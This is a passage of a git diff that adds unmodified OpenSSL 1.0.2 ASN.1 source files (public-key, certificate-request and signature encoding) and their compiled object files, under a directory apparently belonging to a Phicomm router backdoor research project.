+ * Now two pseudo ASN1 routines that take an EVP_PKEY structure and encode or
+ * decode as X509_PUBKEY
+ */
+
+EVP_PKEY *d2i_PUBKEY(EVP_PKEY **a, const unsigned char **pp, long length)
+{
+    X509_PUBKEY *xpk;
+    EVP_PKEY *pktmp;
+    xpk = d2i_X509_PUBKEY(NULL, pp, length);
+    if (!xpk)
+        return NULL;
+    pktmp = X509_PUBKEY_get(xpk);
+    X509_PUBKEY_free(xpk);
+    if (!pktmp)
+        return NULL;
+    if (a) {
+        EVP_PKEY_free(*a);
+        *a = pktmp;
+    }
+    return pktmp;
+}
+
+int i2d_PUBKEY(EVP_PKEY *a, unsigned char **pp)
+{
+    X509_PUBKEY *xpk = NULL;
+    int ret;
+    if (!a)
+        return 0;
+    if (!X509_PUBKEY_set(&xpk, a))
+        return 0;
+    ret = i2d_X509_PUBKEY(xpk, pp);
+    X509_PUBKEY_free(xpk);
+    return ret;
+}
+
+/*
+ * The following are equivalents but which return RSA and DSA keys
+ */
+#ifndef OPENSSL_NO_RSA
+RSA *d2i_RSA_PUBKEY(RSA **a, const unsigned char **pp, long length)
+{
+    EVP_PKEY *pkey;
+    RSA *key;
+    const unsigned char *q;
+    q = *pp;
+    pkey = d2i_PUBKEY(NULL, &q, length);
+    if (!pkey)
+        return NULL;
+    key = EVP_PKEY_get1_RSA(pkey);
+    EVP_PKEY_free(pkey);
+    if (!key)
+        return NULL;
+    *pp = q;
+    if (a) {
+        RSA_free(*a);
+        *a = key;
+    }
+    return key;
+}
+
+int i2d_RSA_PUBKEY(RSA *a, unsigned char **pp)
+{
+    EVP_PKEY *pktmp;
+    int ret;
+    if (!a)
+        return 0;
+    pktmp = EVP_PKEY_new();
+    if (!pktmp) {
+        ASN1err(ASN1_F_I2D_RSA_PUBKEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    EVP_PKEY_set1_RSA(pktmp, a);
+    ret = i2d_PUBKEY(pktmp, pp);
+    EVP_PKEY_free(pktmp);
+    return ret;
+}
+#endif
+
+#ifndef OPENSSL_NO_DSA
+DSA *d2i_DSA_PUBKEY(DSA **a, const unsigned char **pp, long length)
+{
+    EVP_PKEY *pkey;
+    DSA *key;
+    const unsigned char *q;
+    q = *pp;
+    pkey = d2i_PUBKEY(NULL, &q, length);
+    if (!pkey)
+        return NULL;
+    key = EVP_PKEY_get1_DSA(pkey);
+    EVP_PKEY_free(pkey);
+    if (!key)
+        return NULL;
+    *pp = q;
+    if (a) {
+        DSA_free(*a);
+        *a = key;
+    }
+    return key;
+}
+
+int i2d_DSA_PUBKEY(DSA *a, unsigned char **pp)
+{
+    EVP_PKEY *pktmp;
+    int ret;
+    if (!a)
+        return 0;
+    pktmp = EVP_PKEY_new();
+    if (!pktmp) {
+        ASN1err(ASN1_F_I2D_DSA_PUBKEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    EVP_PKEY_set1_DSA(pktmp, a);
+    ret = i2d_PUBKEY(pktmp, pp);
+    EVP_PKEY_free(pktmp);
+    return ret;
+}
+#endif
+
+#ifndef OPENSSL_NO_EC
+EC_KEY *d2i_EC_PUBKEY(EC_KEY **a, const unsigned char **pp, long length)
+{
+    EVP_PKEY *pkey;
+    EC_KEY *key;
+    const unsigned char *q;
+    q = *pp;
+    pkey = d2i_PUBKEY(NULL, &q, length);
+    if (!pkey)
+        return (NULL);
+    key = EVP_PKEY_get1_EC_KEY(pkey);
+    EVP_PKEY_free(pkey);
+    if (!key)
+        return (NULL);
+    *pp = q;
+    if (a) {
+        EC_KEY_free(*a);
+        *a = key;
+    }
+    return (key);
+}
+
+int i2d_EC_PUBKEY(EC_KEY *a, unsigned char **pp)
+{
+    EVP_PKEY *pktmp;
+    int ret;
+    if (!a)
+        return (0);
+    if ((pktmp = EVP_PKEY_new()) == NULL) {
+        ASN1err(ASN1_F_I2D_EC_PUBKEY, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    EVP_PKEY_set1_EC_KEY(pktmp, a);
+    ret = i2d_PUBKEY(pktmp, pp);
+    EVP_PKEY_free(pktmp);
+    return (ret);
+}
+#endif
+
+int X509_PUBKEY_set0_param(X509_PUBKEY *pub, ASN1_OBJECT *aobj,
+                           int ptype, void *pval,
+                           unsigned char *penc, int penclen)
+{
+    if (!X509_ALGOR_set0(pub->algor, aobj, ptype, pval))
+        return 0;
+    if (penc) {
+        if (pub->public_key->data)
+            OPENSSL_free(pub->public_key->data);
+        pub->public_key->data = penc;
+        pub->public_key->length = penclen;
+        /* Set number of unused bits to zero */
+        pub->public_key->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+        pub->public_key->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+    }
+    return 1;
+}
+
+int X509_PUBKEY_get0_param(ASN1_OBJECT **ppkalg,
+                           const unsigned char **pk, int *ppklen,
+                           X509_ALGOR **pa, X509_PUBKEY *pub)
+{
+    if (ppkalg)
+        *ppkalg = pub->algor->algorithm;
+    if (pk) {
+        *pk = pub->public_key->data;
+        *ppklen = pub->public_key->length;
+    }
+    if (pa)
+        *pa = pub->algor;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pubkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_pubkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..491485a9c90a398195cf0ad062eb90a7c98f09de
GIT binary patch
literal 7848
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_req.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_req.c
new file mode 100644
index 0000000..ae293aa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_req.c
@@ -0,0 +1,116 @@
+/* crypto/asn1/x_req.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+/*-
+ * X509_REQ_INFO is handled in an unusual way to get round
+ * invalid encodings. Some broken certificate requests don't
+ * encode the attributes field if it is empty. This is in
+ * violation of PKCS#10 but we need to tolerate it. We do
+ * this by making the attributes field OPTIONAL then using
+ * the callback to initialise it to an empty STACK.
+ *
+ * This means that the field will be correctly encoded unless
+ * we NULL out the field.
+ *
+ * As a result we no longer need the req_kludge field because
+ * the information is now contained in the attributes field:
+ * 1. If it is NULL then it's the invalid omission.
+ * 2. If it is empty it is the correct encoding.
+ * 3. If it is not empty then some attributes are present.
+ *
+ */
+
+static int rinf_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                   void *exarg)
+{
+    X509_REQ_INFO *rinf = (X509_REQ_INFO *)*pval;
+
+    if (operation == ASN1_OP_NEW_POST) {
+        rinf->attributes = sk_X509_ATTRIBUTE_new_null();
+        if (!rinf->attributes)
+            return 0;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_enc(X509_REQ_INFO, enc, rinf_cb) = {
+        ASN1_SIMPLE(X509_REQ_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(X509_REQ_INFO, subject, X509_NAME),
+        ASN1_SIMPLE(X509_REQ_INFO, pubkey, X509_PUBKEY),
+        /* This isn't really OPTIONAL but it gets round invalid
+         * encodings
+         */
+        ASN1_IMP_SET_OF_OPT(X509_REQ_INFO, attributes, X509_ATTRIBUTE, 0)
+} ASN1_SEQUENCE_END_enc(X509_REQ_INFO, X509_REQ_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_REQ_INFO)
+
+ASN1_SEQUENCE_ref(X509_REQ, 0, CRYPTO_LOCK_X509_REQ) = {
+        ASN1_SIMPLE(X509_REQ, req_info, X509_REQ_INFO),
+        ASN1_SIMPLE(X509_REQ, sig_alg, X509_ALGOR),
+        ASN1_SIMPLE(X509_REQ, signature, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END_ref(X509_REQ, X509_REQ)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_REQ)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_REQ)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_req.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_req.o
new file mode 100644
index 0000000000000000000000000000000000000000..9c6294ba97fd6d0b587b58027fbf4f98c0e92189
GIT binary patch
literal 5240
zcmcJT-)kII6vyvoV;gI2($*irN*Srv6wR=Sw%TH4vthFdO_P{xN<?J3n@pN*lHE8v
zn<k1H6sx5ciqcv{C8(6X2nByoeF{V&Z@!B72gJ9EPyWDq&fRl%?w-uhV)4SxIp=e~
z=iEDYe%wi3PxtpU#A1qDOg*cDh^bQ7ngc(n-K5&7cBtQ*cmH|g$4cu+@7dk!$a~*f
z={?h(c%k{iO7k}>tJkpDDyn+V-HrXf;-MPfE8@c<-Y??Y%s=x_@3~-zvHgjI&T#rU
z<+(38h2msMl?x}F+{_8I#hhR9T*VrvZ=h#T&AVQ?P%5f&C4bT#_tjh_KkY86obP*u
ze8qRmI9=IzEn7rKT*Q`$IgHA0WC7WyMJ&Sx3I6A}=@#qDb-7tu>&*nzZ{4D<Ekbuz
z@PvqEh}Q|{wpn&?oayd9WVMavD@DIz9kidY6YU*ORdm?#T4%yeJh`ums|k30ac%B^
zUuIxb!S!1~#`n!V;A4xuJgj01EwNo&H#eP!N#GnF)ICb=MccQn<;{knZB3a~U61b*
zUU#(pq&L~|5ax%lcS6`lA?#`h`#yyIL~JM7D1+<WsD8T<)*lajgW=lo>eXk(p^|KO
z0%$Pm=(QwKTwfKLf%P|SfZKt@RPZz`km4cDx776JeHb_NH32wr73i7U;9&hF0?TB(
z!Ny=dOBC1F-%7OJ#Fc)-)<cNmYTE{eAg=D(z(;}bePnh{NAOd?cfd?}eL43G@a-`F
zBv@>G-+l-_Yjg)4u7Jfl2PkIEcM!8rUD~X{5%oO;S@Sc*>{FLE>u^N<F@mi53u5-E
zOPeilgQ9*?=<f%P=f#cBYY*w?g+4+2wBUz{UljZZ@yo>dIT`~VHqXfj?nm&qBlrgq
z{PPI@Wdv6X4s6Kwxbk36cE<C;9$bcf+V_JvS6K)G+@Kw)&=6%#rhhQi)$a`U^o*pl
zPPQx6pLSGv+9|rHoML5WMon}Uoci6qE^-RK>KYm70PD^=AXbIW36T)=L!X!#jAP_u
zR9}A5b6rEALvu=j942B89dy(c)dgxpOjPEK;uz_!uKvv6aP7=eeOYHDJKQ&rsiD4s
zY&w(H5}h#6bu^8gIv5&F9Z5f53%jzAn;Ok(0o;51Cc!r=-h+SNsJ3>xFY$W>zyFx)
z4>O1*KN_KbF@nz;d^h-9|J4Y7E`om?!LLT}PU3jJ_rZ_HO&Pq^;KK%gz~Fg<<37%H
zJcFC{-!QmY|2>17^*=SZS^sN;?*X63<#z@=u64VQMSA4sE|4&I@Rn0*$l$n(Em3@&
zEY`tqrzMK#$Rfu&4^w=};0@%X!E?vPdfdOUS^8Mzc)xK=lEeBP6!#jO$3!$`aGVdW
zDK>MSk5rL9n)5_`C-p6p#c}tNk7k8@p3fnQai7A5{88;y54ay;V|}U`s_SHtw~>#g
z1pzeH_f<pHYVdu;&{*W-8k_6<jNp6@e0^DefOHc=-$U_&;KwL_SMW)Smj$1v_$$Fr
zQ_Sne^SMa;7oopQv9imHvwkiQ*7vG*iapPr$=SZU;46C~=jW82FPD|=l`ueghur}o
ziZlTaI_;U#cy4AR=R{?Xmu6?(A`~r_eAkAL{Pwb+8=t25M6qJed8Ikm^B1X#JLODz
zxmlN|d^^^HWWE>7I!Ow?H6i$Po7Cto@EYNltdXiSMxUr_l+Xeg-6qoUbGnzf{38E@
zbkfN29|r-}{IB^Pkc&0>xdc}?9zV-~ERWAN4IF(r{&5mq5&4#glMsikpGBYMoR90b
z34U_@aQ_P%-=c@r;)#L|o28GzVGP``@z-elA<D<`acnvMNnj|U;lQi5BrQlA1G1Kg
zJ%}+sA@~&KKPEU$N9SPIEAV4xO5c|kggT}6EO6X!<oqvDzD0R#`20Ek3>>T}^RH3<
zIt$6l{7-;~t$!>1sdb(5aQzW+K0iNUV`IuP7KL`5=7E2I;@&3naepKUctJZ)!XLzf
Vi4gvV3D0k${}X-@l+>Qg{}=G{8?yia

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_sig.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_sig.c
new file mode 100644
index 0000000..dd33720
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_sig.c
@@ -0,0 +1,69 @@
+/* crypto/asn1/x_sig.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+ASN1_SEQUENCE(X509_SIG) = {
+        ASN1_SIMPLE(X509_SIG, algor, X509_ALGOR),
+        ASN1_SIMPLE(X509_SIG, digest, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(X509_SIG)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_SIG)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_sig.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_sig.o
new file mode 100644
index 0000000000000000000000000000000000000000..4736959e7280591337c80500e21eaf3c98c85a34
GIT binary patch
literal 3048
zcmbuBJ8u&~5XZ+HkMK?+o&uq(cnCPzA&7?nIfTR@SxJ-x6baD9agM|g+hAWrpnyoU
zAW>03LqowQpv?!M;3H5%iRcg#%>QoYZdsoTV5Hrd`OVDkdT)2-rz7Rjb-5g=<meKm
zo>HR4O{ras%p&zuAAR3>=*QI;+d;mfi~Ze}f6?+!C;rUo{5gN>T8S!43(XeI*A{|y
zh^UCJrB{LIb(U|(t?*yFJ>4ow!^7v@qu1w_8{x8h&O7DhPZrKBM{eQCK;Fv_9*c22
zz<O3#+Xil>vFpU^UITNuL3YK8a*rn|x6+$Cux(S%Oa9TQIVdsxZP57)b|r(&SWMgw
zh5cPm-+pxj7&w_H0bE!AXO+VvWr-90`p$?$8#~};COJxXf5OOc3~pdv%~sP*Y=^cb
zwrMyNomUe@wnJMw*nTGc#y;q`ILy4ySpQk69AK?Ef+BUb3%|h}<7<uTYM1;6lJByH
zX#Nw!jsns>XN~dm;%okE_SKe9q~3SoAG&Z_@!PcpuS$B6{dVxc4?~(CsQJp$U@auS
zR35)PRQAV5N2f-n{pq30<q@BTrp5|>Eez^D7gB9tJ}pi|jMJeS!9$}8o=)fAX$651
zi`*zUR4$EA@-%U9e0Z7{Ff~1SZL9<c(Ps|t%MNZof5oyFK^B`IiE#%%(}nAa)OSJ0
z*Sikh&rSIW83!D1h4Kpq-(zt7rnuMXElS@FaJ)q-`@~R=`v-BO9(R#Qe>+eS9gF7g
zj9tR{hJfps@LhB)*f%tlK{1r;x^*1ouH@aa^7G=8*M3wFD|4*FR;(A*Y6VLbFAP>f
z^5!dHg}k|To4i&N4$=!=fn6j;ge?wwOU-I!sgsjeZPx2Sg9mFg!@%Rm{A4?<RPTwu
z&{+2Fx0?5ZR`^J&gGD}xm3p8{{U7aeG4|GeF^kL~#i&m^<eGAT9h{+}3EA$I!>}eC
z-xIZZcJy1~y#u#j{#9mKV$Y9rj4}VUzQDB@6Yr}jtK#4en4<Hm9^oKtd;Yglr0=)5
z<f<XM$U1BPKFR*+dBpzV8`=AJn_1TUpP54@VwLo6V#US`tE~C;K+H-$=EvOj{CAmQ
zeqAS<k>mkcj>jtL1xGc2ZEnhvBsOkl!HnEz%<#72UYjy2^{xro*7YlX!v<3A`c<i4
z)I`yC{VV2K`!_2WYF6s7fB1Kx^?LrZ=0?dEnSVwW*4w2X@2Y+FP+!ENSU$!o>1Ei&
S?_(>geofZ@F3F4yyZ$%ClmcV`

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_spki.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_spki.c
new file mode 100644
index 0000000..1df6b87
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_spki.c
@@ -0,0 +1,82 @@
+/* crypto/asn1/x_spki.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
